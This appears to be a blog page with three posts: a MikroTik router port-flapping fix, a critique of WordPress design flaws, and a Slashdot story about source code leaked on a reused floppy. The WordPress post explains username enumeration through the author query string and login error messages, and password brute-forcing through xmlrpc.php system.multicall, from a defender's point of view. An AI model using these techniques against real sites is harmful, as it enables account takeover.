MikroTik local link up / down on high traffic

One of our RouterBOARD routers – MikroTik RB750 (mipsbe with Atheros 7240 switch) running the version v6.35.2 (latest version) have been constantly crashing on high network load. One particularly interesting note is that it crashed on traffic that goes through the internal switch but not on other traffic.

The log file shows the following pattern:
may/13 21:23:17 interface,info ether1-gateway link up (speed 100M, full duplex)
may/13 21:23:17 interface,info ether2-master-local link up (speed 100M, full duplex)
may/13 21:23:17 interface,info ether4-slave-local link up (speed 100M, full duplex)
may/13 21:24:21 system,info sntp change time May/13/2016 21:23:38 => May/13/2016 21:24:21
may/13 21:26:22 interface,info ether2-master-local link down
may/13 21:26:22 interface,info ether4-slave-local link down
may/13 21:26:24 interface,info ether2-master-local link up (speed 100M, full duplex)
may/13 21:26:24 interface,info ether4-slave-local link up (speed 100M, full duplex)
may/13 21:29:16 interface,info ether2-master-local link up
may/13 21:29:16 interface,info ether4-slave-local link down
may/13 21:29:17 interface,info ether2-master-local link down
may/13 21:29:18 interface,info ether2-master-local link up (speed 100M, full duplex)
may/13 21:29:18 interface,info ether4-slave-local link up (speed 100M, full duplex)
may/13 21:36:01 interface,info ether4-slave-local link down

A little search on the internet shows that we are not alone. Port flapping is widespread in MikroTik world. There are many reports with the similar problem dating back to 2011, but there are no solution:

My guess is that switch chip is broken / dead /malfunctioning / buggy. Or the switch “part” of MikroTik router is sensitive to voltage / current changes.

But anyway, we solved this by disabling the switch and changed each port to different subnet (Bridging also may work). Now all the traffic is sent through the CPU, and even when MikroTik advertises, that switch have wire-speed, we noticed that traffic-through-CPU have even better performance.

WordPress still insecure by design

Some major WordPress design flaws have led to widespread attacks on our and your servers. The only hope is reasonably long and strong passwords or WordPress security plugins.

The first flaw. By default WordPress have enabled “feature”, when you visit your blog with author query string appended, it nicely reveals your usernames. For example, if you have:


just add


and default WordPress installation redirects you to the:


In you need next valid username, change 1 to 2:


The second flaw. WordPress have two separate login error messages:

ERROR: Invalid username


ERROR: The password you entered for the username admin is incorrect.

So basically, you can check if particular username is valid.

The third flaw. Many users use .htaccess to secure the wp-admin directory, but WordPress coders decided to include public accessible script in the admin folder. So securing admin folder breaks your site in many ways. Of course you can write more advanced .htaccess rules, but it is not excuse for including public script in the admin folder.

Both front-end and back-end Ajax requests use admin-ajax.php

Forth flaw. Allow hackers to iterate hundreds of usernames/passwords in the single web request (system.multicall), and do it via public accessible script, that is not hidden behind wp-admin folder. Just brilliant! By the way, flaw is still not fixed, and even if you have not so popular site, you will still see your log files full of password guessing requests from different IP addresses: - - [13/Oct/2015:17:26:55 -0400] "POST /xmlrpc.php HTTP/1.0" 200 561 "-" "-"

Note, that IP is given as an example.

Read more about this system.multicall thing here: Brute Force Amplification Attacks Against WordPress XMLRPC

The fifth flow (and not the last). If you have some flaws / vulnerabilities, please share them in comments. Of course only publicly known ones. If you have newly discovered flaw, use proper disclosure channels.

If your source code is a trade secret, then make sure that employees and management knows that too…

When management tries to save money, and there are no formal policies and procedures, then don’t get surprised when data leaks occur… Ungrounded Lightning shares the following story at Slashdot.

Reminds me of story about a graphics chip company

I’ll leave the company name out (mostly to protect my source B-) )

This was in the early part of the cycle of:
– A handful of companies made graphics accelerator chips..
– A BUNCH of new companies also made graphics accelerator chips.
– There was a shakeout and only a few survived – not necessarily many – or any – of the original handful.
The company in question was one of the original few.

The hardware was good. But much of the performance advantages were due to some good algorithms in the driver, which were applicable to other good, bad, or moderate capability hardware, rather than depending on special features of the company’s product.

As with many Silicon Valley companies, where the value added was so high that the administration could be utterly wacky or clueless and the company would still survive for years, this one had some managers make some dumb decisions.

One dumb decision was to try to save money by limiting the personnel to one new floppy disk per month. So the developers kept reusing the disks they had, when they shouldn’t.

As a result, the golden master for an object-only release of the driver was built on a used disk, which had once held the complete sources of the driver in question. Apparently the “reformat” process used didn’t overwrite the sectors – but the manufacturing process that cloned the golden master DID copy those sectors.

A customer tried an undelete utility and found almost the entire source code. Oops!

This news got out. Over the next couple years the great algorithms went from being a valuable trade secret (much of the company’s “secret sauce”) to a de facto industry standard.

Source: Slashdot